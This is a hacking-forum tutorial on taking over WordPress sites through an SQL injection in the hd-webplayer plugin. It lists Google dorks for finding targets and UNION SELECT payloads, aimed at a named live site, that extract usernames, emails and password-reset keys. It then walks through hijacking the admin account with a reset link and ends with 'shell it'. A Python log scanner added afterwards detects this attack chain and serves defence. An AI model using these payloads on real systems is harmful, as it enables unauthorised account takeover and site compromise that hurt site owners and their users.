Hack WordPress site with SQL injection
As requested by a few of you, I decided to make this small tutorial on how to hack a WordPress site that has an SQLi in a plugin.
So let's begin.
I will use this 0day here by AMY hacker.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Once you have found your site, you need to find the admin email and username.
I will be using this site for example:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
When I add ' the text disappears, so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now you enter either the username or the email.
We can enter either one, so it doesn't matter.
I entered email.
Now when you get:
"Check your e-mail for the confirmation link."
It means that the reset key was successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login=
So my link will be:
Enter new password:
Login with new password and shell it.
That's it guys.
Thanks for reading!
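From the site owner's side, each step above leaves a trace in the web server access log. The Python below is an added example, not part of the original tutorial: it flags requests to the hd-webplayer endpoints whose id parameter is not a plain integer, and lists clients that touched the wp-login.php reset flow after such a request. The combined log format, the numeric-only id rule and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameters from the dorks above; numeric-only ids are an assumption.
PLUGIN_PARAMS = {
    "/wp-content/plugins/hd-webplayer/playlist.php": "videoid",
    "/wp-content/plugins/hd-webplayer/config.php": "id",
}
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SQL_HINTS = re.compile(r"union\s+select|group_concat|wp_users|user_activation_key", re.I)
RESET_ACTIONS = {"lostpassword", "retrievepassword", "rp", "resetpass"}

def plugin_finding(path, query):
    """Return None, 'non-numeric-id' or 'sqli-keywords' for one request."""
    param = PLUGIN_PARAMS.get(path)
    if param is None or param not in query:
        return None
    value = " ".join(query[param])
    if re.fullmatch(r"\d+", value):
        return None  # a plain integer id is treated as legitimate
    return "sqli-keywords" if SQL_HINTS.search(value) else "non-numeric-id"

def scan(lines):
    """Return (findings, chained_ips) for an iterable of access-log lines."""
    findings, suspects, chained = [], set(), []
    for n, line in enumerate(lines, 1):
        if not (m := REQUEST_RE.match(line)):
            continue
        ip, parts = m.group(1), urlsplit(m.group(2))
        query = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes
        reason = plugin_finding(parts.path, query)
        if reason:
            findings.append((n, ip, reason))
            suspects.add(ip)
        elif (parts.path.endswith("/wp-login.php") and ip in suspects
              and ip not in chained and RESET_ACTIONS & set(query.get("action", []))):
            chained.append(ip)  # reset flow used after a flagged plugin request
    return findings, chained

def log_line(ip, request):  # builds one constructed combined-format log line
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "{request} HTTP/1.1" 200 512'
P = "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid="
SAMPLE = [  # constructed traffic, documentation IP ranges
    log_line("198.51.100.7", P + "3"),
    log_line("198.51.100.7", P + "3'"),
    log_line("198.51.100.7", P + "-3%20UNION%20SELECT%201,2,group_concat(user_login)%20FROM%20wp_users--"),
    log_line("198.51.100.7", "POST /wp-login.php?action=lostpassword"),
    log_line("203.0.113.9", "GET /wp-login.php?action=rp&key=K&login=L"),
]
```

Calling `scan(SAMPLE)` returns the flagged line numbers with their reasons, plus the one client that went on to the reset flow; a password reset from a client with no prior plugin finding is not reported.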
this is hard, can you help me?
Nice post, I get good experience from the post... waiting for a new one. WordPress is the best CMS I think.